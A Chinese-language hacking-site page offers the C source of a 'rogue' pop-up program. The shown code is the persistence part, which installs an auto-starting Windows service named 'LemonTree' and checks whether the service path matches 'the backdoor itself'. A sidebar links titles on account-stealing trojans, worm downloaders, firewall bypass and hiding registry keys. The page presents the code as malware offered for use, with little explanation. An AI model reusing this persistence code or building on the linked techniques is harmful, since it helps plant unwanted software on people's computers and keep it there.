|
[推荐]一个弹窗口的流氓软件源码
代码:
/**************************************************************************************************
* 全局变量
**************************************************************************************************/#define SERVICE_NAME L”LemonTree”
#define SERVICE_DESCRIPTION L”LemonTree”
#define SERVICE_DISPLAY_NAME L”LemonTree”SERVICE_STATUS serviceStatus;
SERVICE_STATUS_HANDLE hServiceStatus;BOOL ServiceInstall( WCHAR * ); //安装服务
BOOL ServiceUnstall( WCHAR * ); //删除服务
void ServiceControl( DWORD ); //控制服务
BOOL ServiceExists( WCHAR * ); //判断服务是否存在/***********************************************************************************
* 安装服务
* 参数:主程序全路径
* 返回:成功返回TRUE,否则为FALSE
***********************************************************************************/BOOL ServiceInstall( WCHAR *exeFilePath )
{
WCHAR tmpPath[MAX_PATH] = { 0 };
HKEY key;SC_HANDLE serviceMangerHandle = OpenSCManager( NULL, NULL, SC_MANAGER_CREATE_SERVICE );
if ( serviceMangerHandle == 0 )
{
printf( “Install: Open services manager database error: %d\n”, GetLastError() );
return FALSE;
}SC_HANDLE serviceHandle = CreateService
(
serviceMangerHandle ,
SERVICE_NAME ,
SERVICE_DISPLAY_NAME ,
SERVICE_ALL_ACCESS ,
SERVICE_WIN32_OWN_PROCESS ,
SERVICE_AUTO_START ,
SERVICE_ERROR_NORMAL ,
exeFilePath ,
NULL ,
NULL ,
NULL ,
NULL ,
NULL
);if ( serviceHandle == 0 )
{
printf( “Create service error: %d\n”, GetLastError() );CloseServiceHandle( serviceMangerHandle );
return FALSE;
}wcscpy( tmpPath, L”SYSTEM\CurrentControlSet\Services\” );
wcscat( tmpPath, SERVICE_NAME );if( RegOpenKey( HKEY_LOCAL_MACHINE, tmpPath, &key ) != ERROR_SUCCESS )
{
printf( “Open key %s error: %d\n”, tmpPath, GetLastError() );
return FALSE;
}RegSetValueEx( key, L”Description”, 0, REG_SZ, (BYTE *)SERVICE_DESCRIPTION, wcslen(SERVICE_DESCRIPTION) );
RegCloseKey(key);
if( !StartService( serviceHandle, 0, 0 ) )
{
printf( “Install service ok, but start it error: %d\n”, GetLastError() );
}
else
{
printf( “Install service ok, start it ok.\n” );
}CloseServiceHandle( serviceHandle );
CloseServiceHandle( serviceMangerHandle );return TRUE;
}/**************************************************************************************************
* 删除服务
**************************************************************************************************/BOOL ServiceUnstall( WCHAR *serviceName )
{
SC_HANDLE scmHandle = OpenSCManager (NULL, NULL, SC_MANAGER_ALL_ACCESS);if ( scmHandle == NULL )
{
return FALSE;
}SC_HANDLE scHandle = OpenService( scmHandle, serviceName, SERVICE_ALL_ACCESS );
if( scHandle == NULL )
{
CloseServiceHandle( scmHandle );return FALSE;
}DeleteService( scHandle );
CloseServiceHandle( scHandle );
CloseServiceHandle( scmHandle );return TRUE;
}
/**************************************************************************************************
* 服务控制函数
**************************************************************************************************/void ServiceControl( DWORD request )
{
#ifdef DEBUG
LogToFile( L”ServiceControl: Into ServiceControl\n” );
#endifswitch ( request )
{
case SERVICE_CONTROL_PAUSE:serviceStatus.dwCurrentState = SERVICE_PAUSED;
break;
case SERVICE_CONTROL_CONTINUE:
serviceStatus.dwCurrentState = SERVICE_RUNNING;
break;
case SERVICE_CONTROL_STOP:
#ifdef DEBUG
LogToFile( L”ServiceControl: Try to stop service\n” );
#endifserviceStatus.dwWin32ExitCode = 0;
serviceStatus.dwCurrentState = SERVICE_STOP_PENDING;
serviceStatus.dwCheckPoint = 0;
serviceStatus.dwWaitHint = 0;break;
case SERVICE_CONTROL_INTERROGATE:
break;
default:
#ifdef DEBUG
LogToFile( L”ServiceControl: Error arguments\n” );
#endifbreak;
}if( !SetServiceStatus( hServiceStatus, &serviceStatus ) )
{
#ifdef DEBUG
WCHAR tmp[256] = { 0 };
wsprintf( tmp, L”ServiceMain: Control service error: %d\n”, GetLastError() );
LogToFile( tmp );
#endif
}return;
}BOOL ServiceExists( WCHAR *path )
{
WCHAR tmpPath[MAX_PATH] = { 0 };
HKEY key;
WCHAR value[512] = { 0 };int type = REG_EXPAND_SZ;
int size = sizeof(value);wcscpy( tmpPath, L”SYSTEM\CurrentControlSet\Services\” );
wcscat( tmpPath, SERVICE_NAME );if( RegOpenKeyEx( HKEY_LOCAL_MACHINE, tmpPath, 0, KEY_QUERY_VALUE, &key ) != ERROR_SUCCESS )
{
//printf( “RegOpenKeyEx Error: %d\n”, GetLastError() );
return FALSE;
}if( RegQueryValueEx( key, L”ImagePath”, NULL, (DWORD *)&type, (BYTE *)value, (DWORD *)&size ) != ERROR_SUCCESS )
{
//printf( “RegQueryValueEx Error: %d\n”, GetLastError() );return FALSE;
}if( key ) RegCloseKey( key );
// 如果服务的程序路径等于后门本身,表示已经安装
if( 0 == _wcsicmp( value, path ) )
{
return TRUE;
}return FALSE;
}
| 网游盗号木马实现手记 | 01-09 |
| 黑色技术蠕虫下载者[完整源码] | 11-01 |
| 利用BCB自己打造QQ炸弹 | 10-23 |
| 从内存中加载并启动一个exe(delp | 09-27 |
| 开启和关闭Windows xp 防火墙(de | 09-27 |
| 让你的程序通过XP防火墙(delphi编 | 09-27 |
| 如何让你的程序安全通过windows防 | 08-20 |
| 如何透过程序来控制 Windows (XP | 08-20 |
| 动易2005-2006算号器的源代码 | 08-11 |
| API对注册表进行操作(Delphi编程 | 07-30 |
| 一段隐藏注册表项的代码 | 07-26 |
| 了解VB编写病毒的大体方法 | 07-02 |
您现在的位置: